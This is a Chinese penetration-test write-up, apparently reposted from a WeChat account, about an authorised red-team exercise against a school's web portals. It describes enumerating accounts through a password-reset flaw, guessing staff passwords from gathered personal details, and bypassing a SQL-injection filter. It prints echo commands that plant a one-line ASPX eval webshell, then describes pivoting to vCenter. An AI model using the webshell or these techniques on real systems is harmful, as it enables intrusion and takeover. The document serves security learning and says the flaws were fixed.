攻防演练纪实 | 从艰难的外网打点到内网漫游

admin 2023年9月5日14:32:58评论13 views字数 2321阅读7分44秒阅读模式

攻防演练纪实 | 从艰难的外网打点到内网漫游

点击蓝字 关注我们

攻防演练纪实 | 从艰难的外网打点到内网漫游

免责声明:The3ight原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

注意:工具、脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

0x01 前言


某次攻防演练中(已获授权),直觉告诉我资产表中的某个主域有搞头,于是有了这篇文章。

注:此次攻防演练发现的所有漏洞该单位已全部修复。

此处借用一位大佬的话:文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。


0x02 艰难的外网打点


前期对资产进行搜集发现有如下资产:

test0.xxxx.com-校园平台
test1.xxxx.com-教务系统
test2.xxxx.com-后勤系统


首先尝试测试后勤系统,发现该系统已经被别的队伍搞到管理员锁定,经过简单测试没有发现什么漏洞。

攻防演练纪实 | 从艰难的外网打点到内网漫游


然后从校园平台入手,识别到为shiro框架,祭出10W+的字典没有跑出来(后续拿下后发现Shiro版本大于1.2.4,Key为动态生成。无图自行脑补),随即从网站功能点入手。


尝试登录发现弹出敏感信息,因为是学校类型站点,在正常流程测试完没有发现明显入口点后我本人比较倾向于从"人"的方向入手。


通过前端弹出的敏感信息,在进行针对个人的信息搜集时发现这两位老师同时都有一个8位数字的用户名,并且用户名也比较相似,看起来像是有一定的规律。

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游


用搜集到的密码尝试登录发现这次报错与之前的报错并不一样,原因是登录口对密码强度做了前端的限制,这个密码强度限制也为后续成功进入该系统做了铺垫。

攻防演练纪实 | 从艰难的外网打点到内网漫游


转战教务系统,发现该系统有找回密码的功能,对前期搜集到的用户名进行找回测试,发现不仅会提示账号是否存在,而且会直接返回出系统里该账号绑定的邮箱。这对于社工层面上来说简直就是福音。

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游


为了更快地搜集到更多的登录账号与账号相关的信息,爆破8位的登录账号显然是不现实的,前两位相似暂时不管,于是选择手动修改第3位和第4位、用字典爆破后四位数字,一边爆破登录账户,一边对爆出的账户进行个人层面的信息搜集


当我以为即将有眉目的时候,现实直接给了我一棒槌。经历了整整一夜漫长的信息搜集,找到了一堆用户的邮箱等信息,但是当时是没有一个登录成功的。这一夜好像做出什么成果,又好像没有,实在是扛不住就先去睡下了。


攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

(箭头处为后期陆陆续续发现的登录账号与口令)



迎来转机


下午醒了之后接着搞,在搜集其中一位用户的信息时,常用密码与组合字典等均登录失败,在准备放弃进行下一位"受害者"时,发现该用户有一个常用用户名为xxx111222,考虑到前端密码强度限制的原因,我尝试将xxx111222修改为Xxx111222后终于成功进入了该平台。

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游


进入后台之后没有找到高危可Shell的洞,为了尽快拿下Shell先去找了上传点,发现了两处上传点:一处全平台通用的上传(下图2)、一处ewe编辑器的上传。但是经过测试发现存在防护,上传都会被拦掉显示404,尝试多种姿势也没有绕过,此处当时就先搁置了。

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游


继续摸索发现校园平台可直接跳转至教务和后勤,在教务系统探索一波无果,连上传点都没有。后勤的后台没有找到注入,但是有上传点,不过很遗憾同样也是有防护。可恶,又尬住了。

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游



意外之喜


可以看到从校园平台点击完相关按钮后,可以直接跳转至教务和后勤的功能界面,当时就想抓个包看看怎么个事。抓包看到了勤站点的登录跳转包,然后,哎~心心念念的界面就来了。

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游


虽然有防护拦截,但是问题不大,注入点过滤了空格,这里使用%1e绕过。

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游


当时的脑子已经是一摊浆糊了,当时想着跑一下管理员的密码登入后台在搞,但是其实跳转链接是可以越权到管理员账户的,就算登录后台也同样是上传绕不过去。但是就是在查表的时候,发生的这一幕让我一度怀疑打到不干净的东西了,并且后续在启用xp_cmdshell等操作中也多次显示Mysql报错。

攻防演练纪实 | 从艰难的外网打点到内网漫游攻防演练纪实 | 从艰难的外网打点到内网漫游


人麻了,最后经过苦苦尝试使用declare设置十六进制并把执行的命令回显插入到新建的表里成功绕过,最后查询表里的内容即可成功看到回显。

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游


看到回显的时候心情突然舒坦不少,接下来尝试远程下载上线CS,但不管是PowerShell还是Certutil等都被拦掉了。


突然想起来报错的时候泄露了物理路径,尝试通过Echo写一句话,很好,可以直接写入且能成功访问到

echo "test 2023" >e:xxxxxxxxxxxxxxxx.aspx
echo "<%@ Page Language="Jscript"%><%eval(Request.Item["XXXXX"],"unsafe");%>" >e:xxxxxxxxxxxxxxxx.aspx

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游


至此经过漫长的外网打点,成功拿下内网机器权限,接下来就是平平无奇的内网渗透,拿下多台数据库、主机权限,并通过多层内网打下Vcenter,拿下整个集群。

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游

从图里看会发现内网地址比较乱,捋一下大概是这么个情况:

入口机(test2.xxxx.com-内网地址192.168.0.24经过网段探测发现除了与192.168.0.1/24互通之外还与10.0.0.1/16互通。通过MSSQL弱口令拿下10.0.55.30服务器将55.30服务器作为跳板机继续进行内网网段探测发现又与192.168.28.0/24互通横向,各种漏洞,结束。


实在是泰容易辣,总结一下虽然此次拿下整个内网是因为SQL注入,但是如果没有前期的信息搜集我也发现不了该漏洞,有时候系统层面的安全可能做得比较好,但是从"人"的方面入手也往往会撕开口子,也请各位一定要保护好个人信息安全。

攻防演练纪实 | 从艰难的外网打点到内网漫游

-END-

攻防演练纪实 | 从艰难的外网打点到内网漫游

攻防演练纪实 | 从艰难的外网打点到内网漫游


点击阅读原文了解更多




原文始发于微信公众号(渗透练习生):攻防演练纪实 | 从艰难的外网打点到内网漫游

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月5日14:32:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   攻防演练纪实 | 从艰难的外网打点到内网漫游https://cn-sec.com/archives/2004645.html

发表评论

匿名网友 填写信息